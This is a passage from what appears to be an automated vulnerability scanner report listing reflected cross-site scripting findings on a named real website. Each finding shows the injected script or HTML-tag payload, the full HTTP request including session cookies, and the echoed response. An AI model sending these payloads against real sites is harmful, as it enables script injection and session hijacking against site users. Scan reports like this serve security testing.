<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos28f34<script>alert(1)</script>4763ec48b1e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1280. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1bf2<script>alert(1)</script>c639c876438 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/search.phpa1bf2<script>alert(1)</script>c639c876438?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.phpa1bf2<script>alert(1)</script>c639c876438?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1281. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fa299<a>ae51feab1a2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Searchfa299<a>ae51feab1a2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Searchfa299<a>ae51feab1a2&opt=2 was not found on this server.</p>
...[SNIP]...

2.1282. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7f1e8<a>98342fb0375 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...7f1e8<a>98342fb0375&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...7f1e8<a>98342fb0375&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1283. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3bb09<script>alert(1)</script>eecb0857e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3bb09<script>alert(1)</script>eecb0857e32=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3bb09<script>alert(1)</script>eecb0857e32=1 was not found on this server.</p>
...[SNIP]...

2.1284. http://www.resellerbase.com/detail/15/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 84fb0<a>e5db80ab1fb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=284fb0<a>e5db80ab1fb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=284fb0<a>e5db80ab1fb was not found on this server.</p>
...[SNIP]...

2.1285. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dd74<script>alert(1)</script>d8286ae79d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dd74<script>alert(1)</script>d8286ae79d7/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dd74<script>alert(1)</script>d8286ae79d7/15/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1286. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3249b<script>alert(1)</script>f48ada90573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/153249b<script>alert(1)</script>f48ada90573/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/153249b<script>alert(1)</script>f48ada90573/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1287. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 72eed<script>alert(1)</script>b732159e07c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes72eed<script>alert(1)</script>b732159e07c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes72eed<script>alert(1)</script>b732159e07c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1288. http://www.resellerbase.com/detail/15/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb420<script>alert(1)</script>6951b53e135 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/search.phpbb420<script>alert(1)</script>6951b53e135?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.phpbb420<script>alert(1)</script>6951b53e135?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1289. http://www.resellerbase.com/detail/15/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f7b02<a>7ce5ee6f25b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Searchf7b02<a>7ce5ee6f25b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Searchf7b02<a>7ce5ee6f25b&opt=2 was not found on this server.</p>
...[SNIP]...

2.1290. http://www.resellerbase.com/detail/15/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e52a1<a>720e7c3b8b7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...e52a1<a>720e7c3b8b7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...e52a1<a>720e7c3b8b7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1291. http://www.resellerbase.com/detail/15/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 19198<script>alert(1)</script>66f016d078a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2&19198<script>alert(1)</script>66f016d078a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=2&19198<script>alert(1)</script>66f016d078a=1 was not found on this server.</p>
...[SNIP]...

2.1292. http://www.resellerbase.com/detail/15/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/15/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5adfe<a>faf0919be86 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=25adfe<a>faf0919be86 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/themes/search.php?keyword=search...&Submit3=Search&opt=25adfe<a>faf0919be86 was not found on this server.</p>
...[SNIP]...

2.1293. http://www.resellerbase.com/detail/16/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d54fa<script>alert(1)</script>74d0697652d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild54fa<script>alert(1)</script>74d0697652d/16/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild54fa<script>alert(1)</script>74d0697652d/16/ was not found on this server.</p>
...[SNIP]...

2.1294. http://www.resellerbase.com/detail/16/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload db2be<script>alert(1)</script>74c70b752e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16db2be<script>alert(1)</script>74c70b752e9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16db2be<script>alert(1)</script>74c70b752e9/ was not found on this server.</p>
...[SNIP]...

2.1295. http://www.resellerbase.com/detail/16/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef368<script>alert(1)</script>9d2cd536c35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/?ef368<script>alert(1)</script>9d2cd536c35=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/?ef368<script>alert(1)</script>9d2cd536c35=1 was not found on this server.</p>
...[SNIP]...

2.1296. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a292f<script>alert(1)</script>ea43a5b7aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila292f<script>alert(1)</script>ea43a5b7aac/16/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila292f<script>alert(1)</script>ea43a5b7aac/16/rating.php was not found on this server.</p>
...[SNIP]...

2.1297. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51894<script>alert(1)</script>20bf8a920084789cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail51894<script>alert(1)</script>20bf8a920084789cd/16/rating.php?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51894<script>alert(1)</script>20bf8a920084789cd/16/rating.php?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1298. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffc05<script>alert(1)</script>76a51091d8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16ffc05<script>alert(1)</script>76a51091d8c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
